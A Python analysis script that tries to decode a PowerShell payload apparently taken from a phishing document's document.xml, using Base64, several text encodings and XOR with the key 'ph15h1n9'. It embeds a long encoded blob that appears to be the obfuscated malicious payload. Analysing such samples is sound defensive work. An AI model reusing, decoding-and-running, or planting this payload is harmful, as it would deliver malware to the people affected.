#!/usr/bin/env python3 """ Decode the PowerShell payload extracted from document.xml """ import base64 import re print("=" * 70) print("DECODING POWERSHELL PAYLOAD FROM DOCUMENT.XML") print("=" * 70) # Read the saved payload with open('payload.txt', 'r', encoding='utf-8') as f: payload = f.read().strip() print(f"Payload length: {len(payload)} characters") print(f"First 100 chars: {payload[:100]}") # This appears to be PowerShell Base64 encoded command # Try to decode it as base64 directly try: decoded = base64.b64decode(payload) print("\n" + "=" * 70) print("BASE64 DECODED OUTPUT:") print("=" * 70) # Try UTF-16 LE (PowerShell's encoding) try: decoded_utf16 = decoded.decode('utf-16-le') print("UTF-16 LE decoding:") print(decoded_utf16[:500]) print("\n[... content continues ...]") except: pass # Try UTF-8 try: decoded_utf8 = decoded.decode('utf-8', errors='ignore') print("\nUTF-8 decoding:") print(decoded_utf8[:500]) except: pass # Try ASCII try: decoded_ascii = decoded.decode('ascii', errors='ignore') print("\nASCII decoding:") print(decoded_ascii[:500]) except: pass except Exception as e: print(f"Error decoding: {e}") import traceback traceback.print_exc() print("\n" + "=" * 70) print("ALTERNATIVE: Check if payload needs XOR first") print("=" * 70) def xor_decrypt(text, key): """XOR decrypt text with key""" result = [] key_len = len(key) key_pos = 0 for i, char in enumerate(text): key_pos = (key_pos % key_len) result.append(chr(ord(char) ^ ord(key[key_pos]))) key_pos += 1 return ''.join(result) # Try XOR then base64 decode try: xor_result = xor_decrypt(payload, "ph15h1n9") print(f"After XOR (first 200 chars): {xor_result[:200]}") # Try to base64 decode b64_result = base64.b64decode(xor_result) print("\nAfter XOR + Base64 decode:") print(b64_result.decode('utf-8', errors='ignore')[:500]) except Exception as e: print(f"Error: {e}") # Compare with the payload from decode_payload.py print("\n" + "=" * 70) print("COMPARING WITH decode_payload.py PAYLOAD") print("=" * 70) original_payload = """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""" print(f"\ndecode_payload.py payload starts with: {original_payload[:100]}") print(f"document.xml payload starts with: {payload[:100]}") print(f"\nThese are DIFFERENT payloads!")